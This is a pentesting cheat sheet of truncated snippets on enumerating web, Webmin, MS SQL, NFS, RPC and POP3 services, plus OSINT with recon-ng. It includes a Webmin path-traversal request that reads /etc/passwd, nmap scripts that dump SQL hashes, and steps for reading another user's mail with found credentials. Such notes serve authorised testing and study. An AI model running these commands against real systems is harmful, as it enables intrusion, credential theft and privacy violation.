# HTTP Enumeration
- Search for folders with gobuster:
```ShellSession
gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
```
- OWASP DirBuster - HTTP folder enumeration - can take a dictionary file
- Dirb - Directory brute force finding using a dictionary file
```ShellSession
dirb http://$ip/ wordlist.dict
dirb <<ht...
```
# Information Gathering (OWASP Guide)
<!-- TOC -->
- [Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001)](#conduct-search-engine-discoveryreconnaissance-for-information-leakage-otg-info-001)
- [Test Objectives](#test-objectives)
- [How to Test](#how-to-test)
- [Use a search engine to search ...
# Miniserv and Webmin Enumeration
## Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
```ShellSession
curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%0...
```
# MS SQL Server Enumeration
- Nmap Information Gathering
```ShellSession
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQL...
```
# NFS Enumeration (Network File System)
- Show Mountable NFS Shares
```ShellSession
nmap -sV --script=nfs-showmount $ip
```
...
# OSINT By recon-ng
## Case study (trivago.com)
```Bash
> recon-ng
## now let's add a workspace
> workspaces add trivago.com
## Add the target domain
> add domains trivago.com
## Double check if domain is added
> show domains
## find related hosts to our domain
> load netcraft
> run
## check added h...
```
# Passive information gathering
<!-- TOC -->
- [Google](#google)
- [Email Harvesting](#email-harvesting)
- [Netcraft](#netcraft)
- [Whois](#whois)
- [Recon-ng](#recon-ng)
- [Search for people](#search-for-people)
- [Search Engine Recon Defenses](#search-engine-recon-defenses)
<!-- /TOC -->
## Google
- use search ter...
# POP3 Enumeration
## Reading other people's mail
You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet:
```ShellSession
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean
list
+OK 2 1807
1 786
2...
```
# RPC Enumeration (Remote Procedure Call)
## Connect to an RPC share without a username and password and enumerate privileges
```ShellSession
rpcclient --user="" --command=enumprivs -N $ip
```
## Connect to an RPC share with a username and enumerate privileges
```ShellSession
rpcclient --user="" --command=enumpriv...
```
# Scanning
## War Dialers
- War dialers dial a sequence of telephone numbers, attempting to locate modem carriers or a secondary dial tone
- Demon dialers dial a single number to conduct a brute-force attack against passwords
- Often, an unprotected modem provides the easiest method for penetrating a network
- Many recent news stories abou...